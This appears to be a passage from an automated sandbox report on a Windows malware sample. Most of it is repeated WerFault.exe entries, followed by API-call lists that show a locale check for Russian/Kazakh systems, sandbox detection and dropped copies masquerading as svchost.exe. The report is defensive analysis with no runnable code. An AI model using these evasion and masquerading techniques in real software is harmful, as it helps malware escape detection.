Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C74920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,IsUserAnAdmin,IsUserAnAdmin,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h	2_2_02C74920
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01744920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,#680,#680,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h	6_2_01744920
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_03104920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,#680,#680,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h	7_2_03104920
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01524920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,#680,#680,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h	10_2_01524920

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,	0_2_00403900
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,	0_2_00402C10
Source: C:\Windows\apppatch\svchost.exe	Code function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,	2_2_00403900
Source: C:\Windows\apppatch\svchost.exe	Code function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,	2_2_00402C10
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,	2_2_02C85890
Source: C:\Windows\apppatch\svchost.exe	Code function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,	2_2_02C77020
Source: C:\Windows\apppatch\svchost.exe	Code function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,	2_2_02C844F0
Source: C:\Windows\apppatch\svchost.exe	Code function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,	2_2_02C90BE0
Source: C:\Windows\apppatch\svchost.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,	2_2_02C92320
Source: C:\Windows\apppatch\svchost.exe	Code function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,	2_2_02C89860
Source: C:\Windows\apppatch\svchost.exe	Code function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,	2_2_02C8B810
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,	2_2_02C911C0
Source: C:\Windows\apppatch\svchost.exe	Code function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,	2_2_02C7C9F0
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,	2_2_02C71180
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetModuleFileNameA,StrStrIA,	2_2_02C91150
Source: C:\Windows\apppatch\svchost.exe	Code function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,	2_2_02C71670
Source: C:\Windows\apppatch\svchost.exe	Code function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,	2_2_02C8FFE0
Source: C:\Windows\apppatch\svchost.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,	2_2_02C8FDC0
Source: C:\Windows\apppatch\svchost.exe	Code function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,	2_2_02C92590
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,CreateMutexA,GetLastError,	2_2_02C73510
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 